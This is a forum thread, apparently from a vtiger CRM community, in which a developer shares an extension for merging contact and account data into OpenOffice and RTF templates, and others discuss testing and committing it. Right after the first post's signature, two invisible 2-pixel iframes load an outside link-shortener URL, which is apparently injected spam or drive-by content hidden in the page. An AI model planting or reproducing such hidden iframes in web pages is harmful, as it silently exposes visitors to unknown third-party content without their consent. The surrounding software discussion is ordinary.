Merge with Open Office Documents

Hello,

Based on the rtf merge and the dynamic creation of .odt files I wrote an extension for merging open office documents in vtiger.

Open Office documents are ziped xml files, so you only have to unzip it, merge the data an zip it again. For now, the merge is only working in the contact module. Besides the odt merge I have also included the rtf merge mentioned above.

It works fine on my linux system, which is build on 6765 svn. The php version is 5.1.4, apache is 2.0.55 and mysql 5.0.21.

Anyway, as I tested it on the pre-beta version on my windows xp system, I got only a hacking attempt message.

The fields in the template have the following form: CONTACT_FIRSTNAME

Attached is the Merge.php (copy to modules/Contacts), the class for zipping files (test/wordtemplatedownload) and two samplemerge files, for Open Office and rtf merge.

Nico <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 14 Comments sorted by Votes Date Added
  • thanks nico, this was on my list of things to do for 5.1, i'll move this into trunk when i get some time.

matt
  • thanks for doing so. did you test it yourself or and if, does it working on you system?

nico
  • hello again,

i've worked on the accounting merge and did some minor changes to the contacts merge.

if anybody tested it, i would be glad to get some feedback.

nico
  • i haven't had any chance to test or merge this yet. i am planning to get into my 5.x work very shortly. in the mean time, feel free to post this to the list, someone with more time on their hands may want to help get this merged in as well.

thanks again for your contribution, come join us on the mailing list!

matt
  • if this will work on 4.2.3 i will help test, but would this take away my already working rtf merge for office? which i love exceppt for the file size's
    of rtf's with images.
  • @ matt

thanks for the tip, i'll post it on the developer list, if i have some time.

@ joe

i doubt that this will work on 4.2.3 because of the different database setups of both versions. this merge includes both, the rtf merge- customized for version 5.0 - and the open office merge. its not that hard to change the files, so that they can be used for version 4.2.3, but i'll look next for the leads and helpdesk modules.

nico
  • latest update for the contact and the account module. did only some minor changes - cleared out the code.

nico
  • commited to branches/vtigercrm-5.0.2-mmbrich in revision 7877.

this is my personal branch, i haven't had a chance to test the feature out yet but anyone is welcome to play around with this branch and report issues back to me.

thanks again for this contribution!

matt
  • hello nico,

i have read your thread of wide interests. i want to test your merge scripts but i have some problems to find documentation to the “pperkmann_43f083f578913.zip”. can you please post where i found a manual for this files.
    another problem is i don’t know where to copy the files.

thanks
    m00ser
  • thanks for the post.
    i suppose the acc ist to be copied in /modules/accounts and so

my question is.
    how can i use this?
    i measn, i create an account/contact, and ..?
This discussion has been closed.